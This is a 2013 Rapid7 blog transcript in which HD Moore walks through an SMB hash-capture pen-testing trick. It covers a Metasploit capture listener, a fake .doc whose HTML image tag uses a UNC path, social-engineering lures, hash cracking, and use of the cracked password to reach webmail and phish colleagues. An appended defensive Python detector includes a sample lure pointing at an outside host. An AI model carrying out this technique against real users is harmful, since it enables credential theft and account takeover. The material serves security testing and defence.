EZ Mode Hacking with Metasploit

February 27, 2013

In this week's Whiteboard Wednesday, Rapid7 CSO HD Moore walks us through a simple pen testing trick that doesn't require use of exploits. This technique can be a useful tool in a social engineering campaign to measure users' security awareness.

Video Transcript

Hi, My name is H. D. Moore. I'm the CSO of Rapid7 and the founder of the Metasploit Project. In this Whiteboard Wednesday, I want to cover what I call EZ Mode, which is a fun pen testing trick that doesn't require any exploits or really much of anything else but the Metasploit framework and a little bit of time.


So, in this example, I want to cover something that's called SMB hash capture. It doesn't really have a good name for it, but it's a technique I use quite a bit during pen testing.

First thing you want to do is install Metasploit on a server connected to the Internet. So in this case, we've got our evil hacker with the awesome mohawk here, and he's got his laptop set up. He's shoveling to a server online. He's got Metasploit framework running. He's got the console open, and he does use auxiliary/server/capture/smb.

What this module will do is create a fake SMB listener, wait for a connection from a client, tell it that it can't log in, wait for it to try to log in, capture the password and tell it to go away. In that case, you don't get the clear text password. You get a password encrypted with the network challenge key. Sorry, you get the password that's initially encrypted using [inaudible 0:59], encrypted again to the challenge key. That form of password, even though you can't really do much with it as it is, you can crack it and hopefully obtain the clear text password.

So the first thing we're going to do is, after we've got Metasploit up and running, we're going to create an HTML file. Just on your desktop, open up notepad.exe. Enter in <img src= the IP address of the server you're using for the attack, followed by \ and a share name. It can be anything random here. It doesn't matter. Followed by anything that ends in .jpeg or .png or another common image format.

What you're going to do then is save that HTML file as a .doc or a .docx file. That causes the attachment to open up in Word, which then gets rendered by Internet Explorer as HTML when it figures out that it's not really a Word document. So it's a cool trick that lets you basically, even if the user's using Firefox or Chrome as a normal browser, force the Internet Explorer rendering engine to be called, which in turn will process this UNC URL path, causing it to connect back to our evil machine and get the password for the user running, opening the document.

So in this case, we create the document, create the HTML file, rename it as a .doc file. We send it to our target user here, who has a very nice purple tie. They say, "Oh, look, a random Word doc I have," and they open it up. So they open it up, and there's nothing malicious in it. Antivirus won't catch it. There's nothing really bad about this, besides it having an image link in it.

Nothing really happens. It kind of freezes for a second, times out. Say, "Okay, that was weird," whatever, close it.

To be more effective, you can actually take a document the user has written, embed the image link into that document and save it as HTML. Rename it back to .doc again and send it back to them, saying, "Hey, I think you've got a typo on this line." That usually convinces them, "Hey, I need to go look at this thing and figure it out."

This is really good in marketing departments. You can destroy marketing departments with this email process.

So once the user opens up that doc, what's going to happen is their Windows PC is going to connect back to the server running Metasploit. It's going to try to log in as a user name. It's first going to try to log in as a null account or a guest account. It's going to say, "No, no. You can't log in as guest. Log in for real." Your Windows PC will then automatically log in with your user name and password in the encrypted format to the server.

At this point, the attacker has the encrypted form of the password. Now the really cool thing about that is if they can crack the password, either using a rainbow table with something like the HalfLM tables, which are good for this kind of attack, or using something like John the Ripper, they can then use that clear text password to log back into the company from the outside, either using something like the VPN, if you've got VPN access through credentials, or even just logging in to Outlook Web Access. Sometimes that's what I've done before. I've used this to get access to Outlook Web Access, used that to download their email spool, found other passwords. Used that to conduct phishing attacks inside the company at that point, as that user. So they're much more trustworthy because they're coming from that particular user at that point.

And that's really it. So that's it for this week. Thank you and see you next week.
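A defender-side check for the lure described in this transcript, added here as an example and not part of the original post or of the Metasploit Framework: a mail gateway or triage script can flag an attachment whose extension says Word but whose bytes are really HTML, and in particular HTML that references an image over a UNC path or file:// URL, which is exactly what makes the client's SMB stack reach out and authenticate. The sample attachments below are constructed for the example; the function names and the 198.51.100.7 address are assumptions.

```python
import re

# Magic bytes of genuine Word containers.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # legacy .doc (Compound File Binary)
ZIP_MAGIC = b"PK\x03\x04"                          # .docx (OOXML is a zip container)

# Tags whose src/href/data attribute Internet Explorer will fetch automatically,
# pointing at a UNC path (\\host\share\...) or a file:// URL.
UNC_SRC_RE = re.compile(
    rb"""(?i)<\s*(?:img|link|script|iframe|embed|object)\b[^>]*?"""
    rb"""\b(?:src|href|data)\s*=\s*["']?(\\\\[^\s"'>]+|file://[^\s"'>]+)"""
)


def file_kind(data: bytes) -> str:
    """Classify the container by its bytes rather than by its file name."""
    if data.startswith(OLE_MAGIC):
        return "ole"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    head = data.lstrip()[:512].lower()
    if b"<html" in head or b"<!doctype html" in head or b"<img" in head:
        return "html"
    return "unknown"


def find_unc_references(data: bytes) -> list[str]:
    """Return every UNC or file:// target referenced by an auto-fetching tag."""
    return [m.group(1).decode("latin-1") for m in UNC_SRC_RE.finditer(data)]


def assess_attachment(name: str, data: bytes) -> dict:
    """Triage verdict for one attachment: extension/content mismatch plus UNC lures."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    kind = file_kind(data)
    claims_word = ext in ("doc", "docx", "dot", "dotx", "rtf")
    mismatch = claims_word and kind not in ("ole", "ooxml")
    refs = find_unc_references(data) if kind != "ole" else []
    return {
        "name": name,
        "kind": kind,
        "extension_mismatch": mismatch,
        "unc_references": refs,
        # Either signal alone is worth a look; both together is the lure from the talk.
        "suspicious": mismatch or bool(refs),
    }


# Constructed samples (not real attachments).
LURE_DOC = (
    b"<html><body><p>Quarterly numbers</p>"
    b'<img src="\\\\198.51.100.7\\share\\logo.png"></body></html>'
)
BENIGN_DOC = OLE_MAGIC + b"\x00" * 64


if __name__ == "__main__":
    for name, blob in (("report.doc", LURE_DOC), ("memo.doc", BENIGN_DOC)):
        print(assess_attachment(name, blob))
```

Blocking outbound TCP 445 at the perimeter stops the capture itself even when the lure gets through, but the file check above tells you which message tried it and who opened it, which is the awareness measurement the talk is after.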